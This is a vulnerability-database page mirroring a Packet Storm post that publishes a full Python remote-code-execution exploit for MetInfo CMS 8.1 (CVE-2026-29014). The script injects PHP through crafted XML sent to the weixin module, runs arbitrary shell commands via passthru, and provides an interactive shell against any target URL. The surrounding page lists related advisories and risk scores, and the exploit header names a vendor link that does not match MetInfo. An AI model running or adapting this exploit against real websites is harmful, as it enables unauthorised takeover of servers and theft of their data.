Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 MetInfo CMS 8.1 PHP Code Injection

🗓️ 24 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 98 Views

MetInfo CMS 8.1 PHP code injection RCE via weixin module with crafted XML and HTTP inputs.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2026-29014
1 Apr 202615:26
circl
CNNVD		MetInfo CMS 安全漏洞
1 Apr 202600:00
cnnvd
CVE		CVE-2026-29014
1 Apr 202612:22
cve
Cvelist		CVE-2026-29014 MetInfo CMS Unauthenticated PHP Code Injection RCE
1 Apr 202612:22
cvelist
EUVD		EUVD-2026-17875
1 Apr 202615:31
euvd
Nuclei		MetInfo CMS <= 8.1 - Remote Code Execution
22 Jun 202605:20
nuclei
NVD		CVE-2026-29014
1 Apr 202613:16
nvd
Packet Storm		📄 MetInfo CMS 8.1 Code Injection
1 Apr 202600:00
packetstorm
Packet Storm		📄 MetInfo CMS 8.1 Shell Upload Mass Exploiter
24 Apr 202600:00
packetstorm
Packet Storm News		MetInfo CMS 8.1 WeChat Module Vulnerability Detection Scanner
24 Apr 202600:00
packetstormnews
Rows per page
==================================================================================================================================
    | # Title     : MetInfo CMS 8.1 PHP Code Injection RCE Exploit                                                                   |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/facebookincubator/below                                                                       |
    ==================================================================================================================================
    
    [+] Summary    : This Python script is a full remote code execution (RCE) exploit suite targeting a vulnerability in MetInfo CMS (≤ 8.1), identified as CVE-2026-29014. 
                     The flaw resides in the weixin module handling logic, where improperly sanitized input allows PHP code injection via crafted XML and HTTP parameters/headers.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import argparse
    import base64
    import re
    import time
    import random
    import string
    from urllib.parse import urljoin
    from threading import Thread
    import socket
    import telnetlib
    
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    BANNER = """
    ╔═══════════════════════════════════════════════════════════════════════════╗
    ║  CVE-2026-29014 - MetInfo CMS PHP Code Injection by indoushka             ║
    ╚═══════════════════════════════════════════════════════════════════════════╝
    """
    
    
    class MetInfoExploit:
        def __init__(self, target_url, proxy=None, timeout=30, verbose=False):
            self.target_url = target_url.rstrip('/')
            self.timeout = timeout
            self.verbose = verbose
            self.session = requests.Session()
            self.session.verify = False
            self.vuln_path = "/app/system/entrance.php"
            self.params = {
                'n': 'include',
                'm': 'module',
                'c': 'weixin',
                'a': 'doapi'
            }
            self.injection_header = None
            self.webshell_url = None
    
            if proxy:
                self.session.proxies = {'http': proxy, 'https': proxy}
    
        def log(self, msg, level="[+]"):
            if self.verbose or level in ["[+]", "[!]", "[-]"]:
                print(f"{level} {msg}")
    
        def trigger_cache_write(self):
            """Trigger initial cache write"""
            self.log("Triggering initial cache write...")
    
            payload = '''<x>
    <MsgType>event</MsgType>
    <Event>SCAN</Event>
    <EventKey>adminlogin&#x26;../config/tables</EventKey>
    <FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}{${die()}}</FromUserName>
    </x>'''
    
            url = urljoin(self.target_url, self.vuln_path)
    
            try:
                response = self.session.post(
                    url,
                    params=self.params,
                    data=payload,
                    headers={'Content-Type': 'application/xml'},
                    timeout=self.timeout
                )
    
                return response.status_code == 200
    
            except requests.exceptions.RequestException:
                return False
    
        def build_php_payload(self, cmd, php_func='passthru'):
            b64_cmd = base64.b64encode(cmd.encode()).decode()
            php_code = f"chdir('../..');print('_____');{php_func}(base64_decode('{b64_cmd}'));print('_____');"
            return base64.b64encode(php_code.encode()).decode()
    
        def execute_command(self, cmd, php_func='passthru'):
            self.trigger_cache_write()
    
            b64_payload = self.build_php_payload(cmd, php_func)
            self.injection_header = f"C: {b64_payload}"
    
            payload = '''<x>
    <MsgType>event</MsgType>
    <Event>SCAN</Event>
    <EventKey>adminlogin&#x26;Array</EventKey>
    <FromUserName>test</FromUserName>
    </x>'''
    
            url = urljoin(self.target_url, self.vuln_path)
    
            try:
                response = self.session.post(
                    url,
                    params=self.params,
                    data=payload,
                    headers={
                        'Content-Type': 'application/xml',
                        'C': self.injection_header
                    },
                    timeout=self.timeout
                )
    
                if response.status_code == 200:
                    match = re.search(r'_____(.*?)_____', response.text, re.DOTALL)
                    if match:
                        return match.group(1).strip()
                    return response.text.strip()
    
            except requests.exceptions.RequestException:
                pass
    
            return None
    
        def check_vulnerability(self):
            self.log("Checking vulnerability...")
    
            test = self.execute_command("echo CVE_2026_29014_TEST")
    
            if test and "CVE_2026_29014_TEST" in test:
                self.log("VULNERABLE!", "[+]")
                return True
    
            self.log("Not vulnerable", "[-]")
            return False
    
        def interactive_shell(self):
            while True:
                try:
                    cmd = input("shell# ").strip()
                    if cmd in ["exit", "quit"]:
                        break
    
                    result = self.execute_command(cmd)
                    print(result if result else "[no output]")
    
                except KeyboardInterrupt:
                    break
    
    
    def exploit_metinfo_rce(target_url, cmd=None, interactive=False,
                            proxy=None, verbose=False):
    
        exploit = MetInfoExploit(target_url, proxy, verbose=verbose)
    
        if not exploit.check_vulnerability():
            return False
    
        if cmd:
            print(exploit.execute_command(cmd))
            return True
    
        if interactive:
            exploit.interactive_shell()
    
        return True
    
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument('-u', '--url', required=True)
        parser.add_argument('-c', '--command')
        parser.add_argument('-i', '--interactive', action='store_true')
        parser.add_argument('--proxy')
        parser.add_argument('-v', '--verbose', action='store_true')
    
        args = parser.parse_args()
    
        print(BANNER)
    
        exploit_metinfo_rce(
            target_url=args.url,
            cmd=args.command,
            interactive=args.interactive,
            proxy=args.proxy,
            verbose=args.verbose
        )
    
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Apr 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 49.3
CVSS 3.19.8
EPSS0.39688
SSVC
metinfo cmsphp code injectionremote code executionweixin modulecrafted xmlhttp inputscve-2026-29014
98